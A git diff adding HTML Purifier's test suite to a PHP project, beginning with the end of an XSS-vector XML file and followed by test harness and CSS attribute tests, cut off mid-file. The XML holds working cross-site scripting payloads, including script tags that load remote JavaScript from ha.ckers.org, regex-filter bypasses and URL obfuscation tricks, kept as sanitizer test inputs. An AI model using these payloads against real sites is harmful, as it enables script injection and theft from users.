<attack> + <name>Event Handlers List 3</name> + <code>See Below</code> + <desc>-onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle) + +-onReset() (fires when user or attacker resets a form) + +-onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) + +-onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) + +-onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) + +-onResume() (fires on every element that becomes active when the timeline resumes, including the body element) + +-onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) + +-onRowEnter() (user or attacker would need to change a row in a data source) + +-onRowExit() (user or attacker would need to change a row in a data source) + +-onRowDelete() (user or attacker would need to delete a row in a data source) + +-onRowInserted() (user or attacker would need to insert a row in a data source) + +-onScroll() (user would need to scroll, or attacker could use the scrollBy() function) + +-onSeek() (fires when the timeline is set to play in any direction other than forward) + +-onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) + +-onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) + +-onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) + +-onStart() (fires at the beginning of each marquee loop) + +-onStop() (user would need to press the stop button or leave the webpage) + +-onSynchRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire) + +-onSubmit() (requires attacker or user submits a form) + +-onTimeError() (fires when user or attacker sets a time property, such as "dur", to an invalid value) + +-onTrackChange() (fires when user or attacker changes track in a playList) + +-onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click) + +-onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) + +-seekSegmentTime() (locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) + +</desc> + <label>Event Handlers</label> + <browser>Browser support:</browser> + </attack> + <attack> + <name>Evade Regex Filter 1</name> + <code><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + + <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the following regex filter: + /<script[^>]+src/i</desc> + <label>XSS w/HTML Quote Encapsulation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Evade Regex Filter 2</name> + <code><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i + +(this is an important one, because I've seen this regex in the wild)</desc> + + <label>XSS w/HTML Quote Encapsulation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Evade Regex Filter 3</name> + <code><SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + <desc>Another XSS to evade this regex filter: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc> + + <label>XSS w/HTML Quote Encapsulation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Evade Regex Filter 4</name> + <code><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + <desc>Yet another XSS to evade the same filter: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i +The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags)</desc> + + <label>XSS w/HTML Quote Encapsulation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Evade Regex Filter 5</name> + <code><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + <desc>And one last XSS attack (using grave accents) to evade this regex: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc> + + <label>XSS w/HTML Quote Encapsulation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Filter Evasion 1</name> + <code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + + <desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc> + <label>XSS w/HTML Quote Encapsulation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Filter Evasion 2</name> + <code><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + <desc>Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc> + + <label>XSS w/HTML Quote Encapsulation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>IP Encoding</name> + <code><A HREF="http://66.102.7.147/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>URL Encoding</name> + <code><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Dword Encoding</name> + <code><A HREF="http://1113982867/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Hex Encoding</name> + <code><A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). +The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required.</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Octal Encoding</name> + <code><A HREF="http://0102.0146.0007.00000223/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). +Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Mixed Encoding</name> + <code><A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). +The tabs and newlines only work if this is encapsulated with quotes.</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Protocol Resolution Bypass</name> + <code><A HREF="//www.google.com/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). +Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Firefox Lookups 1</name> + <code><A HREF="//google">XSS</A></code> + <desc>Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatenate several keywords by using something like the following "keyword:XSS+RSnake"</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Firefox Lookups 2</name> + <code><A HREF="http://ha.ckers.org@google">XSS</A></code> + <desc>This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera.</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Firefox Lookups 3</name> + <code><A HREF="http://google:ha.ckers.org">XSS</A></code> + <desc>This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google").</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Removing Cnames</name> + <code><A HREF="http://google.com/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). +When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly.</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Extra dot for Absolute DNS</name> + <code><A HREF="http://www.google.com./">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>JavaScript Link Location</name> + <code><A HREF="javascript:document.location='http://www.google.com/'">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed) +JavaScript link location</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Content Replace</name> + <code><A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A></code> + <desc>Content replace as an attack vector (assuming "http://www.google.com/" is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector ("java&#x26;#x09;script:" was converted into "java&#x09;script:".</desc> + + <label>URL Obfuscation</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> +</xss> diff --git a/lib/htmlpurifier/tests/CliTestCase.php b/lib/htmlpurifier/tests/CliTestCase.php new file mode 100644 index 000000000..36b728e16 --- /dev/null +++ b/lib/htmlpurifier/tests/CliTestCase.php @@ -0,0 +1,81 @@ +<?php + +/** + * Implements an external test-case like RemoteTestCase that parses its + * output from XML returned by a command line call + */ +class CliTestCase +{ + public $_command; + public $_out = false; + public $_quiet = false; + public $_errors = array(); + public $_size = false; + /** + * @param $command Command to execute to retrieve XML + * @param $xml Whether or not to suppress error messages + */ + public function __construct($command, $quiet = false, $size = false) { + $this->_command = $command; + $this->_quiet = $quiet; + $this->_size = $size; + } + public function getLabel() { + return $this->_command; + } + public function run($reporter) { + if (!$this->_quiet) $reporter->paintFormattedMessage('Running ['.$this->_command.']'); + return $this->_invokeCommand($this->_command, $reporter); + } + public function _invokeCommand($command, $reporter) { + $xml = shell_exec($command); + if (! $xml) { + if (!$this->_quiet) { + $reporter->paintFail('Command did not have any output [' . $command . ']'); + } + return false; + } + $parser = $this->_createParser($reporter); + + set_error_handler(array($this, '_errorHandler')); + $status = $parser->parse($xml); + restore_error_handler(); + + if (! $status) { + if (!$this->_quiet) { + foreach ($this->_errors as $error) { + list($no, $str, $file, $line) = $error; + $reporter->paintFail("Error $no: $str on line $line of $file"); + } + if (strlen($xml) > 120) { + $msg = substr($xml, 0, 50) . "...\n\n[snip]\n\n..." . substr($xml, -50); + } else { + $msg = $xml; + } + $reporter->paintFail("Command produced malformed XML"); + $reporter->paintFormattedMessage($msg); + } + return false; + } + return true; + } + public function _createParser($reporter) { + $parser = new SimpleTestXmlParser($reporter); + return $parser; + } + public function getSize() { + // This code properly does the dry run and allows for proper test + // case reporting but it's REALLY slow, so I don't recommend it. + if ($this->_size === false) { + $reporter = new SimpleReporter(); + $this->_invokeCommand($this->_command . ' --dry', $reporter); + $this->_size = $reporter->getTestCaseCount(); + } + return $this->_size; + } + public function _errorHandler($a, $b, $c, $d) { + $this->_errors[] = array($a, $b, $c, $d); // see set_error_handler() + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/Debugger.php b/lib/htmlpurifier/tests/Debugger.php new file mode 100644 index 000000000..45e107f44 --- /dev/null +++ b/lib/htmlpurifier/tests/Debugger.php @@ -0,0 +1,147 @@ +<?php + +/** + * Debugging tools. + * + * This file gives a developer a set of tools useful for performing code + * consistency checks. This includes scoping code blocks to ensure that + * only the interesting iteration of a loop gets outputted, a paint() + * function that acts like var_dump() with pre tags, and conditional + * printing. + */ + +/* +TODO + * Integrate into SimpleTest so it tells us whether or not there were any + not cleaned up debug calls. + * Custom var_dump() that ignores blacklisted properties + * DEPRECATE AND REMOVE ALL CALLS! +*/ + +/**#@+ + * Convenience global functions. Corresponds to method on Debugger. + */ +function paint($mixed) { + $Debugger =& Debugger::instance(); + return $Debugger->paint($mixed); +} +function paintIf($mixed, $conditional) { + $Debugger =& Debugger::instance(); + return $Debugger->paintIf($mixed, $conditional); +} +function paintWhen($mixed, $scopes = array()) { + $Debugger =& Debugger::instance(); + return $Debugger->paintWhen($mixed, $scopes); +} +function paintIfWhen($mixed, $conditional, $scopes = array()) { + $Debugger =& Debugger::instance(); + return $Debugger->paintIfWhen($mixed, $conditional, $scopes); +} +function addScope($id = false) { + $Debugger =& Debugger::instance(); + return $Debugger->addScope($id); +} +function removeScope($id) { + $Debugger =& Debugger::instance(); + return $Debugger->removeScope($id); +} +function resetScopes() { + $Debugger =& Debugger::instance(); + return $Debugger->resetScopes(); +} +function isInScopes($array = array()) { + $Debugger =& Debugger::instance(); + return $Debugger->isInScopes($array); +} +/**#@-*/ + + +/** + * The debugging singleton. Most interesting stuff happens here. + */ +class Debugger +{ + + public $shouldPaint = false; + public $paints = 0; + public $current_scopes = array(); + public $scope_nextID = 1; + public $add_pre = true; + + public function Debugger() { + $this->add_pre = !extension_loaded('xdebug'); + } + + public static function &instance() { + static $soleInstance = false; + if (!$soleInstance) $soleInstance = new Debugger(); + return $soleInstance; + } + + public function paintIf($mixed, $conditional) { + if (!$conditional) return; + $this->paint($mixed); + } + + public function paintWhen($mixed, $scopes = array()) { + if (!$this->isInScopes($scopes)) return; + $this->paint($mixed); + } + + public function paintIfWhen($mixed, $conditional, $scopes = array()) { + if (!$conditional) return; + if (!$this->isInScopes($scopes)) return; + $this->paint($mixed); + } + + public function paint($mixed) { + $this->paints++; + if($this->add_pre) echo '<pre>'; + var_dump($mixed); + if($this->add_pre) echo '</pre>'; + } + + public function addScope($id = false) { + if ($id == false) { + $id = $this->scope_nextID++; + } + $this->current_scopes[$id] = true; + } + + public function removeScope($id) { + if (isset($this->current_scopes[$id])) unset($this->current_scopes[$id]); + } + + public function resetScopes() { + $this->current_scopes = array(); + $this->scope_nextID = 1; + } + + public function isInScopes($scopes = array()) { + if (empty($this->current_scopes)) { + return false; + } + if (!is_array($scopes)) { + $scopes = array($scopes); + } + foreach ($scopes as $scope_id) { + if (empty($this->current_scopes[$scope_id])) { + return false; + } + } + if (empty($scopes)) { + if ($this->scope_nextID == 1) { + return false; + } + for($i = 1; $i < $this->scope_nextID; $i++) { + if (empty($this->current_scopes[$i])) { + return false; + } + } + } + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/FSTools/FileSystemHarness.php b/lib/htmlpurifier/tests/FSTools/FileSystemHarness.php new file mode 100644 index 000000000..710196e4f --- /dev/null +++ b/lib/htmlpurifier/tests/FSTools/FileSystemHarness.php @@ -0,0 +1,36 @@ +<?php + +/** + * Test harness that sets up a filesystem sandbox for file-emulation + * functions to safely unit test in. + * + * @todo Make an automatic FSTools mock or something + */ +class FSTools_FileSystemHarness extends UnitTestCase +{ + + protected $dir, $oldDir; + + function __construct() { + parent::__construct(); + $this->dir = 'tmp/' . md5(uniqid(rand(), true)) . '/'; + mkdir($this->dir); + $this->oldDir = getcwd(); + + } + + function __destruct() { + FSTools::singleton()->rmdirr($this->dir); + } + + function setup() { + chdir($this->dir); + } + + function tearDown() { + chdir($this->oldDir); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/FSTools/FileTest.php b/lib/htmlpurifier/tests/FSTools/FileTest.php new file mode 100644 index 000000000..e9b703a2d --- /dev/null +++ b/lib/htmlpurifier/tests/FSTools/FileTest.php @@ -0,0 +1,46 @@ +<?php + +require_once 'FSTools/FileSystemHarness.php'; + +/** + * These are not really unit tests, just sanity checks of basic functionality. + */ +class FSTools_FileTest extends FSTools_FileSystemHarness +{ + + function test() { + $name = 'test.txt'; + $file = new FSTools_File($name); + $this->assertFalse($file->exists()); + $file->write('foobar'); + $this->assertTrue($file->exists()); + $this->assertEqual($file->get(), 'foobar'); + $file->delete(); + $this->assertFalse($file->exists()); + } + + function testGetNonExistent() { + $name = 'notfound.txt'; + $file = new FSTools_File($name); + $this->expectError(); + $this->assertFalse($file->get()); + } + + function testHandle() { + $file = new FSTools_File('foo.txt'); + $this->assertFalse($file->exists()); + $file->open('w'); + $this->assertTrue($file->exists()); + $file->put('Foobar'); + $file->close(); + $file->open('r'); + $this->assertIdentical('F', $file->getChar()); + $this->assertFalse($file->eof()); + $this->assertIdentical('oo', $file->read(2)); + $this->assertIdentical('bar', $file->getLine()); + $this->assertTrue($file->eof()); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrCollectionsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrCollectionsTest.php new file mode 100644 index 000000000..227bc9535 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrCollectionsTest.php @@ -0,0 +1,134 @@ +<?php + +Mock::generatePartial( + 'HTMLPurifier_AttrCollections', + 'HTMLPurifier_AttrCollections_TestForConstruct', + array('performInclusions', 'expandIdentifiers') +); + +class HTMLPurifier_AttrCollectionsTest extends HTMLPurifier_Harness +{ + + function testConstruction() { + + generate_mock_once('HTMLPurifier_AttrTypes'); + + $collections = new HTMLPurifier_AttrCollections_TestForConstruct(); + + $types = new HTMLPurifier_AttrTypesMock(); + + $modules = array(); + + $modules['Module1'] = new HTMLPurifier_HTMLModule(); + $modules['Module1']->attr_collections = array( + 'Core' => array( + 0 => array('Soup', 'Undefined'), + 'attribute' => 'Type', + 'attribute-2' => 'Type2', + ), + 'Soup' => array( + 'attribute-3' => 'Type3-old' // overwritten + ) + ); + + $modules['Module2'] = new HTMLPurifier_HTMLModule(); + $modules['Module2']->attr_collections = array( + 'Core' => array( + 0 => array('Brocolli') + ), + 'Soup' => array( + 'attribute-3' => 'Type3' + ), + 'Brocolli' => array() + ); + + $collections->__construct($types, $modules); + // this is without identifier expansion or inclusions + $this->assertIdentical( + $collections->info, + array( + 'Core' => array( + 0 => array('Soup', 'Undefined', 'Brocolli'), + 'attribute' => 'Type', + 'attribute-2' => 'Type2' + ), + 'Soup' => array( + 'attribute-3' => 'Type3' + ), + 'Brocolli' => array() + ) + ); + + } + + function test_performInclusions() { + + generate_mock_once('HTMLPurifier_AttrTypes'); + + $types = new HTMLPurifier_AttrTypesMock(); + $collections = new HTMLPurifier_AttrCollections($types, array()); + $collections->info = array( + 'Core' => array(0 => array('Inclusion', 'Undefined'), 'attr-original' => 'Type'), + 'Inclusion' => array(0 => array('SubInclusion'), 'attr' => 'Type'), + 'SubInclusion' => array('attr2' => 'Type') + ); + + $collections->performInclusions($collections->info['Core']); + $this->assertIdentical( + $collections->info['Core'], + array( + 'attr-original' => 'Type', + 'attr' => 'Type', + 'attr2' => 'Type' + ) + ); + + // test recursive + $collections->info = array( + 'One' => array(0 => array('Two'), 'one' => 'Type'), + 'Two' => array(0 => array('One'), 'two' => 'Type') + ); + $collections->performInclusions($collections->info['One']); + $this->assertIdentical( + $collections->info['One'], + array( + 'one' => 'Type', + 'two' => 'Type' + ) + ); + + } + + function test_expandIdentifiers() { + + generate_mock_once('HTMLPurifier_AttrTypes'); + + $types = new HTMLPurifier_AttrTypesMock(); + $collections = new HTMLPurifier_AttrCollections($types, array()); + + $attr = array( + 'attr1' => 'Color', + 'attr2*' => 'URI' + ); + $c_object = new HTMLPurifier_AttrDef_HTML_Color(); + $u_object = new HTMLPurifier_AttrDef_URI(); + + $types->setReturnValue('get', $c_object, array('Color')); + $types->setReturnValue('get', $u_object, array('URI')); + + $collections->expandIdentifiers($attr, $types); + + $u_object->required = true; + $this->assertIdentical( + $attr, + array( + 'attr1' => $c_object, + 'attr2' => $u_object + ) + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/AlphaValueTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/AlphaValueTest.php new file mode 100644 index 000000000..56efa306f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/AlphaValueTest.php @@ -0,0 +1,28 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_AlphaValueTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_AlphaValue(); + + $this->assertDef('0'); + $this->assertDef('1'); + $this->assertDef('.2'); + + // clamping to [0.0, 1,0] + $this->assertDef('1.2', '1'); + $this->assertDef('-3', '0'); + + $this->assertDef('0.0', '0'); + $this->assertDef('1.0', '1'); + $this->assertDef('000', '0'); + + $this->assertDef('asdf', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundPositionTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundPositionTest.php new file mode 100644 index 000000000..a216b2677 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundPositionTest.php @@ -0,0 +1,68 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_BackgroundPositionTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_BackgroundPosition(); + + // explicitly cited in spec + $this->assertDef('0% 0%'); + $this->assertDef('100% 100%'); + $this->assertDef('14% 84%'); + $this->assertDef('2cm 1cm'); + $this->assertDef('top'); + $this->assertDef('left'); + $this->assertDef('center'); + $this->assertDef('right'); + $this->assertDef('bottom'); + $this->assertDef('left top'); + $this->assertDef('center top'); + $this->assertDef('right top'); + $this->assertDef('left center'); + $this->assertDef('right center'); + $this->assertDef('left bottom'); + $this->assertDef('center bottom'); + $this->assertDef('right bottom'); + + // reordered due to internal impl details + $this->assertDef('top left', 'left top'); + $this->assertDef('top center', 'top'); + $this->assertDef('top right', 'right top'); + $this->assertDef('center left', 'left'); + $this->assertDef('center center', 'center'); + $this->assertDef('center right', 'right'); + $this->assertDef('bottom left', 'left bottom'); + $this->assertDef('bottom center', 'bottom'); + $this->assertDef('bottom right', 'right bottom'); + + // more cases from the defined syntax + $this->assertDef('1.32in 4ex'); + $this->assertDef('-14% -84.65%'); + $this->assertDef('-1in -4ex'); + $this->assertDef('-1pc 2.3%'); + + // keyword mixing + $this->assertDef('3em top'); + $this->assertDef('left 50%'); + + // fixable keyword mixing + $this->assertDef('top 3em', '3em top'); + $this->assertDef('50% left', 'left 50%'); + + // whitespace collapsing + $this->assertDef('3em top', '3em top'); + $this->assertDef("left\n \t foo ", 'left'); + + // invalid uses (we're going to be strict on these) + $this->assertDef('foo bar', false); + $this->assertDef('left left', 'left'); + $this->assertDef('left right top bottom center left', 'left bottom'); + $this->assertDef('0fr 9%', '9%'); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundTest.php new file mode 100644 index 000000000..83461c365 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BackgroundTest.php @@ -0,0 +1,23 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_BackgroundTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $config = HTMLPurifier_Config::createDefault(); + $this->def = new HTMLPurifier_AttrDef_CSS_Background($config); + + $valid = '#333 url("chess.png") repeat fixed 50% top'; + $this->assertDef($valid); + $this->assertDef('url(\'chess.png\') #333 50% top repeat fixed', $valid); + $this->assertDef( + 'rgb(34, 56, 33) url(chess.png) repeat fixed top', + 'rgb(34,56,33) url("chess.png") repeat fixed top' + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BorderTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BorderTest.php new file mode 100644 index 000000000..6cd77fd7a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/BorderTest.php @@ -0,0 +1,21 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_BorderTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $config = HTMLPurifier_Config::createDefault(); + $this->def = new HTMLPurifier_AttrDef_CSS_Border($config); + + $this->assertDef('thick solid red', 'thick solid #FF0000'); + $this->assertDef('thick solid'); + $this->assertDef('solid red', 'solid #FF0000'); + $this->assertDef('1px solid #000'); + $this->assertDef('1px solid rgb(0, 0, 0)', '1px solid rgb(0,0,0)'); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ColorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ColorTest.php new file mode 100644 index 000000000..f3a74e897 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ColorTest.php @@ -0,0 +1,41 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_ColorTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_Color(); + + $this->assertDef('#F00'); + $this->assertDef('#fff'); + $this->assertDef('#eeeeee'); + $this->assertDef('#808080'); + $this->assertDef('rgb(255, 0, 0)', 'rgb(255,0,0)'); // rm spaces + $this->assertDef('rgb(100%,0%,0%)'); + $this->assertDef('rgb(50.5%,23.2%,43.9%)'); // decimals okay + + $this->assertDef('#G00', false); + $this->assertDef('cmyk(40, 23, 43, 23)', false); + $this->assertDef('rgb(0%, 23, 68%)', false); + + // clip numbers outside sRGB gamut + $this->assertDef('rgb(200%, -10%, 